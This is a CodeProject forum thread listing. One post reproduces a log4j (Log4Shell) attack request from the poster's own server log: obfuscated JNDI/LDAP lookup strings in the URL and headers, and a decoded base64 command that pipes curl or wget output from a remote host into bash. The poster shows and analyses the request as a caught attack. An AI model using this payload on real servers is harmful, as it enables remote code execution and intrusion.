Click here to Skip to main content
15,868,016 members

The Weird and The Wonderful

   

The Weird and The Wonderful forum is a place to post Coding Horrors, Worst Practices, and the occasional flash of brilliance.

We all come across code that simply boggles the mind. Lazy kludges, embarrassing mistakes, horrid workarounds and developers just not quite getting it. And then somedays we come across - or write - the truly sublime.

Post your Best, your worst, and your most interesting. But please - no programming questions . This forum is purely for amusement and discussions on code snippets. All actual programming questions will be removed.

 
GeneralIntergalactic cephalopods Pin
honey the codewitch2-Jan-22 9:46
mvahoney the codewitch2-Jan-22 9:46 
JokeRe: Intergalactic cephalopods Pin
Joan M2-Jan-22 9:53
professionalJoan M2-Jan-22 9:53 
GeneralRe: Intergalactic cephalopods Pin
oofalladeez3432-Jan-22 10:10
professionaloofalladeez3432-Jan-22 10:10 
GeneralRe: Intergalactic cephalopods Pin
Mike Hankey2-Jan-22 10:20
mveMike Hankey2-Jan-22 10:20 
GeneralRe: Intergalactic cephalopods Pin
Super Lloyd7-Jan-22 11:57
Super Lloyd7-Jan-22 11:57 
AnswerRe: Intergalactic cephalopods Pin
Eddy Vluggen7-Jan-22 13:26
professionalEddy Vluggen7-Jan-22 13:26 
GeneralRe: Intergalactic cephalopods Pin
Rob Grainger1-Feb-22 3:20
Rob Grainger1-Feb-22 3:20 
GeneralCuter by the day.... PinPopular
Peter_in_278028-Dec-21 17:05
professionalPeter_in_278028-Dec-21 17:05 
The log4j scoundrels are getting cuter. Here's an example request from my forensic log
GET /?x=${jndi%3aldap%3a//195.54.160.149%3a12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTMwLjE2NC4xMzM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC4xMzAuMTY0LjEzMzo0NDMpfGJhc2g=} HTTP/1.1|Host:138.130.164.133%3a443|User-Agent:${${%3a%3a-j}${%3a%3a-n}${%3a%3a-d}${%3a%3a-i}%3a${%3a%3a-l}${%3a%3a-d}${%3a%3a-a}${%3a%3a-p}%3a//195.54.160.149%3a12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTMwLjE2NC4xMzM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC4xMzAuMTY0LjEzMzo0NDMpfGJhc2g=}|Referer:${jndi%3a${lower%3al}${lower%3ad}${lower%3aa}${lower%3ap}%3a//195.54.160.149%3a12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTMwLjE2NC4xMzM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC4xMzAuMTY0LjEzMzo0NDMpfGJhc2g=}|Accept-Encoding:gzip|Connection:close
To make it a bit more readable, here it is with %3a => : and split into individual headers (line splitting is CP's in both blocks)
GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTMwLjE2NC4xMzM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC4xMzAuMTY0LjEzMzo0NDMpfGJhc2g=} HTTP/1.1
Host:138.130.164.133:443
User-Agent:${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTMwLjE2NC4xMzM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC4xMzAuMTY0LjEzMzo0NDMpfGJhc2g=}
Referer:${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTMwLjE2NC4xMzM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC4xMzAuMTY0LjEzMzo0NDMpfGJhc2g=}
Accept-Encoding:gzip
Connection:close
The base64 "KGN1..." decodes to
(curl -s 195.54.160.149:5874/138.130.164.133:443||wget -q -O- 195.54.160.149:5874/138.130.164.133:443)|bash
138.130.164.133 was my public IPv4 address at the time.
Note the cutesy ways they are hiding "jndi" and "ldap" from simple text-string filters.
Needless to say, it got a short sharp 403 response (as does anything that hasn't got a Host header with a real URL I recognise).
APNIC tells me that 195.54.160.149 belongs somewhere in Russia. Surprise surprise... And yes, that's also the source address of the request.
Software rusts. Simon Stephenson, ca 1994. So does this signature. me, 2012


modified 28-Dec-21 23:12pm.

GeneralRe: Cuter by the day.... Pin
Super Lloyd7-Jan-22 12:08
Super Lloyd7-Jan-22 12:08 
GeneralRe: Cuter by the day.... Pin
Peter_in_27807-Jan-22 18:35
professionalPeter_in_27807-Jan-22 18:35 
GeneralRe: Cuter by the day.... Pin
Super Lloyd7-Jan-22 20:32
Super Lloyd7-Jan-22 20:32 
GeneralThis is actually cleaned up! Pin
honey the codewitch14-Dec-21 17:58
mvahoney the codewitch14-Dec-21 17:58 
GeneralRe: This is actually cleaned up! Pin
11917640 Member 14-Dec-21 21:49
11917640 Member 14-Dec-21 21:49 
GeneralRe: This is actually cleaned up! Pin
honey the codewitch15-Dec-21 1:43
mvahoney the codewitch15-Dec-21 1:43 
GeneralRe: This is actually cleaned up! Pin
Slacker00715-Dec-21 7:58
professionalSlacker00715-Dec-21 7:58 
GeneralRe: This is actually cleaned up! Pin
honey the codewitch15-Dec-21 9:17
mvahoney the codewitch15-Dec-21 9:17 
GeneralRe: This is actually cleaned up! Pin
Rick York15-Dec-21 6:30
mveRick York15-Dec-21 6:30 
GeneralRe: This is actually cleaned up! Pin
honey the codewitch15-Dec-21 6:38
mvahoney the codewitch15-Dec-21 6:38 
GeneralRe: This is actually cleaned up! Pin
Rick York15-Dec-21 6:55
mveRick York15-Dec-21 6:55 
GeneralRe: This is actually cleaned up! Pin
honey the codewitch15-Dec-21 6:58
mvahoney the codewitch15-Dec-21 6:58 
GeneralRe: This is actually cleaned up! Pin
jschell23-Jan-22 8:54
jschell23-Jan-22 8:54 
GeneralRe: This is actually cleaned up! Pin
honey the codewitch24-Jan-22 1:00
mvahoney the codewitch24-Jan-22 1:00 
GeneralRe: This is actually cleaned up! Pin
jschell30-Jan-22 6:13
jschell30-Jan-22 6:13 
GeneralRe: This is actually cleaned up! Pin
honey the codewitch30-Jan-22 9:02
mvahoney the codewitch30-Jan-22 9:02 
GeneralRe: This is actually cleaned up! Pin
jschell17-Feb-22 10:33
jschell17-Feb-22 10:33 

General General    News News    Suggestion Suggestion    Question Question    Bug Bug    Answer Answer    Joke Joke    Praise Praise    Rant Rant    Admin Admin   

Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.